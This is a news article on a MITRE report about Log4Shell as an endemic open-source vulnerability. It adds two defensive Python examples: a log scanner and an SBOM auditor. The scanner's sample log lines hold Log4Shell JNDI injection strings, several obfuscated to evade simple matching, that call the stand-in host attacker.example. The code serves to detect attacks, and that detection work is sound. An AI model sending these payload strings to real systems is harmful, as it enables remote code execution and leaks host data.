New MITRE report focuses on ​​Log4Shell, endemic vulnerabilities in open-source libraries

MITRE has released a report on the difficulty open-source software libraries face in getting vulnerability fixes deployed, drawing on the handling of the series of Log4j vulnerabilities last December. Exploitation of those flaws led to many frantic weeks as cybersecurity researchers and defenders sought to stem attacks. The report uses the term ‘endemic vulnerabilities’ for exposures that continue to be found and exploited across connected environments, in old and new software products alike, long after they have been identified and patches have been made available.

The MITRE report evaluates the magnitude of the vulnerability’s impact on numerous software products and projects. The number of affected products, coupled with the challenges of applying fixes, is why the Log4j vulnerability has remained in the global software ecosystem for so long. The report also calls on stakeholders across the public and private sectors to address the risks that endemic vulnerabilities create.

The use of open-source software libraries helps accelerate development, increases standardization, and allows software developers to leverage the expertise of specialists they might not otherwise be able to access, MITRE said in its latest report. “However, when one of these widely used code libraries has an exploitable vulnerability, the security implications can be wide-reaching and long-lived. In particular, such vulnerabilities have a high probability of becoming endemic,” it added.

MITRE operates as a not-for-profit concern and works in the public interest across federal, state and local governments, industry, and academia. It delivers ideas across various areas, including artificial intelligence, intuitive data science, quantum information science, health informatics, space security, policy, and economic expertise, trustworthy autonomy, cyber threat sharing, and cyber resilience.

MITRE defines endemic vulnerabilities as those that persist in the global software ecosystem long after fixes have been identified and published. Vulnerable open-source software libraries are particularly prone to creating endemic vulnerabilities because it can be harder to identify the products that incorporate them, and harder to patch those products even when they are known to be vulnerable. As a result, such exposures can still appear in new products months or years after non-vulnerable versions of the relevant library are available.

The report added that the recent Log4Shell vulnerability is a good example of why such vulnerabilities can have such longevity. Last December, an Alibaba security researcher discovered that Log4j’s JNDI lookup functionality could be exploited and reported the vulnerability to the Apache Software Foundation (ASF)’s Log4j developer team, which quickly released updates mitigating Log4Shell and several related security vulnerabilities.

However, efforts by Google, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and other researchers have uncovered potentially thousands of affected applications across the open-source community, the commercial software industry, and vendors of internet of things (IoT), industrial, and operational technology (OT) products, MITRE said in its report. “A race soon ensued, with software developers, vendors, IT administrators, and network defenders scrambling to apply updates and respond to intrusions on the one side, and a broad range of adversaries, including pranksters, financially motivated criminals, and suspected state-sponsored actors, on the other,” it added.
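As an added illustration of the JNDI lookup mechanism the report refers to, and of what the defenders in that race had to look for, the following example (not code from the MITRE report or the Log4j project) reduces the nested and case-mangled lookup strings that attackers sent, such as `${${lower:j}ndi:...}` and `${::-j}` default-value tricks, the same way Log4j 2 would before it reached the JNDI lookup, then flags the lines that resolve to one. The log lines are constructed; the lookup-evaluation rules are a deliberately small emulation of Log4j 2 behaviour (`:-` defaults, `lower`/`upper`, and the `jndi` prefix), not its real code.

```python
import re

# Constructed web-server log lines (not from any real incident). The User-Agent
# field is used because many applications logged it unchanged through Log4j.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [10/Dec/2021:13:01:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}${lower:n}${::-d}i:${lower:l}dap://attacker.example/b}"',
    '10.0.0.7 - - [10/Dec/2021:13:01:04 +0000] "GET / HTTP/1.1" 200 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap://attacker.example/c}"',
    '10.0.0.8 - - [10/Dec/2021:13:01:05 +0000] "GET / HTTP/1.1" 200 "-" "${jNdI:rMi://attacker.example/d}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:06 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://${hostName}.attacker.example/e}"',
    '10.0.0.10 - - [10/Dec/2021:13:01:07 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.11 - - [10/Dec/2021:13:01:08 +0000] "GET / HTTP/1.1" 200 "-" "build-bot ${date:yyyy-MM-dd}"',
]

# An innermost ${...} lookup: its body contains no nested "$", "{" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# After normalisation, a lookup that would reach JNDI; group 1 is the URL scheme.
JNDI = re.compile(r"\$\{\s*jndi:([a-z]+)[^}]*\}", re.IGNORECASE)


def _resolve(m):
    """Emulate the subset of Log4j 2 lookup evaluation needed to de-obfuscate.

    Log4j splits "${name:-default}" on ":-", evaluates "name", and falls back to
    "default" only when the lookup yields nothing. lower/upper transform their
    key; the jndi prefix is the dangerous one and is left in place so the caller
    can see it; any other lookup becomes a <placeholder> so reduction makes progress.
    """
    body = m.group(1)
    name, _, default = body.partition(":-")
    prefix, _, key = name.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":
        return m.group(0)          # keep: this is what we are hunting for
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if ":-" in body:
        return default             # ${::-j} or ${env:UNSET:-j} evaluates to "j"
    return f"<{name}>"             # host-dependent lookup such as ${hostName}


def normalize(text, max_rounds=20):
    """Reduce nested lookups from the inside out until nothing else resolves."""
    for _ in range(max_rounds):
        reduced = INNERMOST.sub(_resolve, text)
        if reduced == text:
            break
        text = reduced
    return text


def scan_lines(lines):
    """Return one finding per line whose content reduces to a JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, start=1):
        m = JNDI.search(normalize(line))
        if m:
            findings.append({"line": number, "scheme": m.group(1).lower(), "lookup": m.group(0)})
    return findings


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: scheme={f['scheme']} lookup={f['lookup']}")
```

Matching on the literal text `${jndi:` alone misses lines 2 and 3 above; normalising first is what makes the nested and default-value variants visible, and the retained `<hostName>` placeholder on line 5 shows why outbound DNS and LDAP from application servers was worth watching: the lookup leaks host data in the request itself.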

The MITRE report said that containing the Log4Shell vulnerability is challenging because the patches the ASF developed addressed only the Log4j library itself. Every open-source, commercial and in-house application that embeds Log4j needs its own security update to pick up the fixed library, and enterprises and users must then install those updates, it added.

Unfortunately, the breadth of Log4j’s deployment across so many applications throughout the internet – many of which may have been abandoned by their developers, are unmanaged by their users, or simply cannot be patched – guarantees that Log4Shell will remain an endemic vulnerability and pose a continuing risk to internet users for years to come, the report added.

Endemic vulnerabilities are now a fact of life in the global software ecosystem. The presence of known but unpatched exposures provides ‘plentiful fodder’ for malicious hackers, who often assemble collections of compromised machines to support distributed denial-of-service (DDoS) or other attacks on various targets.

The MITRE report said that endemic vulnerabilities can also persist when careless developers use old, vulnerable software libraries in new products. Today’s IT enterprises need to operate in a world where endemic vulnerabilities can create threats inside and outside their networks. While little can be done to eliminate vulnerable software globally, there are steps that can help reduce new vulnerabilities and help enterprises be more resilient in the face of endemic vulnerabilities. 

To address these challenges of endemic vulnerabilities, MITRE calls upon the U.S. government to identify and provide resources to improve critical open-source software technology through accessible grant programs that focus on security through collaboration and cooperation with open source software projects. 

The MITRE report also asked the software industry and companies procuring software-based solutions to adopt technologies such as software bills of materials (SBOMs). This would improve the transparency of which software libraries their products use and depend upon, allowing developers and users to identify and respond to vulnerabilities in underlying software components.
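The following is an added example of the kind of SBOM consumption the report is asking for; it is not code from MITRE, the ASF or any SBOM tool. It walks a CycloneDX JSON document, descending into nested components (the case where a library bundles its own copy of Log4j and a flat dependency list would miss it), and flags every `log4j-core` below the ASF fix threshold for its branch. The SBOM is constructed, and the threshold table (2.17.1 for current 2.x, 2.12.4 for the Java 7 line, 2.3.2 for the Java 6 line) is an assumption about the ASF release history that should be checked against the current advisory before use.

```python
import json
import re

# Constructed CycloneDX 1.4 SBOM for a made-up application. The nested
# "components" entries model libraries that ship their own bundled Log4j.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "metadata": {"component": {"type": "application", "name": "inventory-service", "version": "1.0.0"}},
    "components": [
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api", "version": "2.14.1",
         "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"},
        {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.14.1",
         "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
        {"type": "library", "group": "com.example", "name": "legacy-connector", "version": "3.2.0",
         "components": [
             {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.12.1",
              "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.12.1"}]},
        {"type": "library", "group": "com.example", "name": "reporting-lib", "version": "5.0.0",
         "components": [
             {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.17.1",
              "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"}]},
    ],
})

LOG4J_GROUP, LOG4J_CORE = "org.apache.logging.log4j", "log4j-core"
# Assumed fix thresholds per 2.x branch (the Java 6 and Java 7 maintenance
# lines had their own releases); every other 2.x version must be >= 2.17.1.
FIXED_BY_BRANCH = {(2, 3): "2.3.2", (2, 12): "2.12.4"}
DEFAULT_FIXED = "2.17.1"
_DIGITS = re.compile(r"\d+")


def parse_version(version):
    """Sortable key: three numeric parts, then 0 for a pre-release, 1 for a final release."""
    main, _, qualifier = version.partition("-")
    nums = tuple(int(n) for n in _DIGITS.findall(main))
    nums += (0,) * (3 - len(nums))
    return nums[:3], 0 if qualifier else 1


def log4j_core_status(version):
    """Return a reason string if this log4j-core version needs upgrading, else None."""
    nums, _ = parse_version(version)
    if nums[0] != 2:
        return None  # 1.x is a separate, end-of-life code base, not a Log4Shell fix target
    fixed = FIXED_BY_BRANCH.get(nums[:2], DEFAULT_FIXED)
    if parse_version(version) < parse_version(fixed):
        # Conservative: also flags pre-2.0-beta9 releases that predate the JNDI lookup.
        return f"log4j-core {version} is below fixed version {fixed}"
    return None


def walk_components(components, path=()):
    """Yield (component, path) depth-first, descending into bundled sub-components."""
    for comp in components or []:
        here = path + (f"{comp.get('name')}@{comp.get('version')}",)
        yield comp, here
        yield from walk_components(comp.get("components"), here)


def is_log4j_core(comp):
    if comp.get("group") == LOG4J_GROUP and comp.get("name") == LOG4J_CORE:
        return True
    # Fall back to the package URL when group/name are missing from the entry.
    return (comp.get("purl") or "").startswith(f"pkg:maven/{LOG4J_GROUP}/{LOG4J_CORE}@")


def audit_sbom(sbom_text):
    """Return one finding per log4j-core occurrence that is below its fix threshold."""
    sbom = json.loads(sbom_text)
    findings = []
    for comp, path in walk_components(sbom.get("components")):
        if not is_log4j_core(comp):
            continue
        status = log4j_core_status(comp.get("version", "0"))
        if status:
            findings.append({"path": " > ".join(path), "version": comp["version"], "status": status})
    return findings


if __name__ == "__main__":
    for f in audit_sbom(SAMPLE_SBOM):
        print(f"{f['path']}: {f['status']}")
```

Two details matter in practice: only `log4j-core` carries the lookup code, so `log4j-api` at the same old version is not a finding, and the vulnerable copy inside `legacy-connector` is reported with its path so the fix request goes to the right upstream rather than to the application's own build file.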

It also asked IT enterprises to harden their networks with layered defenses and adopt an ‘assume breach’ mentality. These actions should include outbound network filtering, micro-segmentation strategies derived from zero trust architectures, improved monitoring, and regular exercising of vulnerability and incident response procedures.

“These actions will not eliminate the threat posed by endemic vulnerabilities like Log4Shell – no one has the power to do that – but they can reduce the frequency of such vulnerabilities and enable a more effective response to vulnerabilities that do arise,” the MITRE report concluded.
